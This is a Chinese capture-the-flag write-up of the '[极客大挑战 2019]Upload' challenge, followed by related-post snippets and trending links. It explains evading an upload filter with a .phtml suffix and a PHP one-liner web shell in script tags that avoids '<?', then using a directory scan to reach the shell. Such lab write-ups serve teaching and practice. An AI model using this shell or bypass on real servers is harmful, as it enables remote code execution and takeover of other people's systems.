[极客大挑战 2019]Upload
[极客大挑战 2019]Upload
直接上传了木马文件,无法上传,先判断一下限制是来自客户端(js)还是服务端(对文件后缀、MIME等的检查)
禁用js之后,再上传一下,还是被拦截了,说明是在服务端进行过滤的。
测试服务端的限制,发现含有 php、php2 的都会被拦截掉,说明这是一个黑名单拦截
又修改了 MIME 进行绕过,依然不行,但是根据提示看就知道,被拦截的原因是文件内容被检查了,存在**<?** 就无法上传成功。
使用 js 执行 php 代码,网上找了一个不用 <? 的php一句话代码,修改一下提交。
<script language='php'>eval($_GET['cmd']);</script>
上传的后缀是 phtml 是为了页面可以正常解析php代码。
PHTML网页是一种包含PHP脚本的网页,PHP脚本镶嵌在网页的HTML代码之中。在页面被发送给请求的用户之前,网页服务器调用PHP解释程序来解释和执行PHP脚本。含有PHP脚本的网页通常都以“.php”、“.php3”或“.phtml”作为后缀。和ASP一样,PHP可以被认为是一种“动态网页”。
使用目录扫描,扫描下 文件上传到了哪个目录下面,一般是 upload、file、upload-file、之类的,一般都可以扫出来。
正常访问到了上传的木马文件,接着连接上找找flag就 ok 了
这 上传了不少文件啊 。
[极客大挑战 2019]Upload相关推荐
- BUUCTF-Web:[极客大挑战 2019]Upload
题目 解题过程 1.上传文件 从网页上来看是上传一个图片文件,但我们不知道他是如何检查上传的文件,所以可以试一试上传各种文件.一般检查文件的地方有:后缀名.content-type.文件头的部分内容. ...
- [极客大挑战 2019]Upload(菜刀连接文件上传出现: HTTP/1.1 200 OK)
菜刀连接文件上传出现: HTTP/1.1 200 OK Server: openresty Date: Mon, 06 Apr 2020 08:42:03 GMT Content-Type: text ...
- BUUOJ 极客大挑战 2019套餐
仅为做题思路,记下笔记,如有错误烦请斧正 [极客大挑战 2019]EasySQL 进题目发现是个登陆页面 admin admin登陆一下 注意URL,试试万能密码?username=admin& ...
- [BUUCTF-pwn]——[极客大挑战 2019]Not Bad(ORW)(内涵peak小知识)
[BUUCTF-pwn]--[极客大挑战 2019]Not Bad 又是一道收获满满的题目. peak小知识 seccomp: seccomp是一种内核中的安全机制,正常情况下,程序可以使用所有的sy ...
- BUUCTF Web [极客大挑战 2019]Havefun
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
- BUUCTF-web [极客大挑战 2019]PHP1 之 反序列化漏洞
PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼 ...
- BUUCTF Web 极客大挑战 2019 EasySQL
BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号 首先有点常识: 正常SQL语句这 ...
- [极客大挑战 2019]FinalSQL
[极客大挑战 2019]FinalSQL 依次点击5个页面 到最后一个页面发现提示尝试第6个页面,观察到url中的id,输入6得到 有参数,尝试单引号 提示error 那么应该存在sql注入,尝试永真 ...
- BUUCTF Web [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]LoveSQL [极客大挑战 2019]Knife [极客大挑战 2019]Http
目录 [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]LoveSQL [极客大挑战 2019]Knife [极客大挑战 2019]Http [GXYCTF2019]Pin ...
最新文章
- 解决 ERROR: JDWP Transport dt_socket failed to initialize, TRANSPORT_INIT(510)异常
- c++学习笔记之指针
- [多图/秒懂]白话OpenPose,最受欢迎的姿态估计网络
- 打开mobilenet——ssd的demo.py显示这样的错误解决方法:Intel MKL FATAL ERROR: Cannot load libmkl_avx.so or libmkl_def.s
- 前端学习(1117):严格模式的变化
- mongo:(2)mongoDB简介
- php 正则表达式提取出合法的时间_PHP正则表达式核心技术完全详解 第1节
- python项目软件代码_七套Python库快速提升您项目的代码可维护性,软件工程,代码库...
- thinkphp对数据库操作有哪些内置函数
- Android 学习资料汇总
- postSQL使用存储过程动态查询
- 网页唤起QQ临时会话
- python 移动文件 覆盖_python 剪切移动文件的实现代码
- 阿铭Linux_网站维护学习笔记201903021
- Android OpenCV(六十二):伪彩色增强
- 电脑上游戏视频录制的方法
- 有关凸集的证明例题_关于凸集、凸函数的一些证明
- 搜索计算机文件夹的记录怎么删除,Win7如何删除“我的电脑”搜索栏里面的搜索记录...
- EDA项目 出租车计价器 赏析
- ⑪(面试篇 2/3)、《史上最全iOS八股文面试题》2022年,金三银四我为你准备了,iOS《1000条》笔试题以及面试题(包含答案)。带面试你过关斩将,(赶紧过来背iOS八股文)
热门文章
- 计算机组成原理:真值,原码,补码,反码,移码
- Arch linux 安装 docker
- 基于Python实现的手写数字图像识别
- [python 爬虫]Python爬虫抓取马蜂窝游记的照片 基于xpath
- 冈萨雷斯数字图像处理——彩色图像增强3实例
- 【毕业设计系列】035:基于matlab的线性调频信号的仿真
- 【公告 | 阿布扎比全球市场为中东和北非地区推出加密资产框架】
- win无法连接网络计算机6,用Win7网络诊断工具只需六步轻松解决无线网络连接问题...
- 历史记录画笔 photoshop基础教程-历史记录画笔工具
- 【支付】支付宝H5 或者 pc端 支付